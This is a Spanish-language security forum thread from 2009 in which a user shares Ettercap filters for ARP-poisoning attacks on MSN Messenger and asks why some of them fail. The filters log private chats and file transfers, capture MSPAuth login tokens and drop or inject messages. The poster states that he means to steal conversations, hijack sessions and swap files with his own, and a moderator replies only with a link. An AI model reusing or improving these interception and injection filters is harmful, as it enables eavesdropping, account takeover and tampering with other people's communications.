La Comunidad DragonJAR  

Retroceder   La Comunidad DragonJAR > Seguridad > Redes y conectividad > Seguridad Wireless

¿Qué es La Comunidad DragonJAR?

DragonJAR.org es una comunidad de investigadores, estudiantes, profesionales y entusiastas de la Seguridad Informática, En la cual se busca darle un enfoque eminentemente práctico a la teoría sin olvidar las bases esenciales de esta.

De esta manera se Tratará de ofrecer soluciones útiles a los usuarios, tanto novatos, estudiantes, como a los profesionales e investigadores, Teniendo presente que el mundo de la seguridad informática y la información es un medio que se auto inventa constantemente.

La Comunidad DragonJAR es un espacio abierto y libre para cualquier persona que desee compatir en un ambiente digital sus conocimientos o sus dudas. El registro es gratuito, toma poco tiempo y te permite disfrutar de todas las características del sitio.

Si es tu primera visita, quizás deberías visitar la Ayuda para aprender un poco sobre el uso de los foros, para empezar a ver mensajes, selecciona el foro que quieres visitar de la lista de abajo.

Respuesta
 
LinkBack Herramientas Desplegado
Antiguo 17-May-2009, 10:19   #1
Recien Nacido
 
Fecha de Ingreso: 07-April-2009
Mensajes: 11
Gracias: 0
Agradecido 1 vez en 1 Mensaje
grancerote está en el buen camino
Predeterminado ettercap Filters!!

buenas seniores de dragon jar la verdad no soy muy posteador casi simpre intneto de arreglarmelas pormi mismo pero parece q estoy atascado,
EEn este momento esoty jugando con ETTERCAP una exelente herramienta para el ARP poisoning.

En trandole al tema he intentado crear filtros en los cuales he tenia exito pero npo entodos, uno de mis proyectos fue filtrar el msn y cree esto>


if (ip.proto == TCP && search(DATA.data, "SessionID") ) {
if (ip.src == 6891 || ip.dst == 6891) {
log(DATA.data, "/tmp/msn.P2P.log");
msg("Data en transferencia\n");
}
}
# Estew filtro deberia de tomar todos los files en transferncia pero no melos agarra yo se que el session ID es parte de los paketes de tranferencia pero sigo teniaendo problemas!! alguien sabe como tomar los paquetes de msn tranferidos o saben como recontruirlos osi puedo cambiar de file y remplazarlo por uno mio jheheheh






if (ip.proto == TCP && search(DATA.data, "MSPAuth") ) {
log(DATA.data, "/tmp/loggin.log");
msg("Logging Logged!!\n");
}

# Este otor lo que hace es tomar los paquetes donde se encuentra la authenticacion de msn pero todabia no se como desencriptarlo alguien por la comunidad no tendraa una idea de como o si podria usarlo para logearme yo y robar su session jejeje XD


if (tcp.src == 1863 || tcp.dst == 1863) {
log(DATA.data, "/tmp/msn.chat.v3.log");
msg("Texto plano MSN save!XD\n");
}
}
# este si me funciona a la perfeccion para robar las conversaciones del msn asi podemos ver que chatean jejeje
################################

if (ip.proto == TCP && search(DATA.data, "MSG") ) {
if (tcp.src == 1863 || tcp.dst == 1863) {
msg("Msn Debug logged!\n");
drop();
inject("/tmp/repalcetxt.msn");
msg("Msg Drop and injectted succesful!!\n");
}
}
Se supone q este tendria q reemplazar el msg con el que tengo setiado en el repalcetxt.msn pero no pasa nada mas bien o llega msgs del todo!! el archivo a injectar tiene q ser un script o un msg modificado___??

Yo lo que hice fue tomar un msg y solo le cambie el texto del msg por :msg hacked: y lo guarde en el archivo pero no pasa nada por favor un ejemplo o q tengo q hacer para enterder el inject command!!! gracias
################################################## ###

if (ip.proto == TCP && tcp.src == 1863 && tcp.dst == 1863) {
log(DATA.data, "/tmp/allmsntxt.log");
msg("Appending to ALLMSN TXT\n");
}
if (ip.proto == TCP && tcp.src == 6891 && tcp.dst == 6891) {
log(DATA.data, "/tmp/allmsnP2P.log");
msg("Appending to ALLP2P Log\n");
}

Estos deberian de tomar todo el trafico q pasas por esos puertos pero no pasa nada!! no se crean ni los archivos en tmp alguna idea???

les agradesco cualquier ayuda
grancerote está desconectado   Responder Citando
Antiguo 17-May-2009, 10:26   #2
Moderador Global
 
Fecha de Ingreso: 10-September-2008
Ubicación: Barcelona
Mensajes: 610
Gracias: 92
Agradecido 396 veces en 151 Mensajes
Seifreed llegará a ser famoso muy prontoSeifreed llegará a ser famoso muy pronto
Predeterminado

Pásate por aqui
Jugando con Ettercap - Wiki.AdictoLinux.Org
__________________
Mi web:
http://www.seifreed.net
Asociación cultural y tecnológica:
http://www.badiatech.org
Cursos de informática:
aula.badiatech.org
Wikipedia asociación:
wiki.badiatech.org
Seifreed está desconectado   Responder Citando
Antiguo 17-May-2009, 21:09   #3
Recien Nacido
 
Fecha de Ingreso: 07-April-2009
Mensajes: 11
Gracias: 0
Agradecido 1 vez en 1 Mensaje
grancerote está en el buen camino
Predeterminado

Cita:
Iniciado por Seifreed Ver Mensaje
Gracias!! se agradese el de mailing esta interesante!!!

por casualidad tu no tienes conosimientos en la variable inject todavia no he dado en como utilizarla jeje !!
grancerote está desconectado   Responder Citando
Respuesta

Etiquetas
ettercap, filters

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado



La franja horaria es GMT -6. Ahora son las 13:07.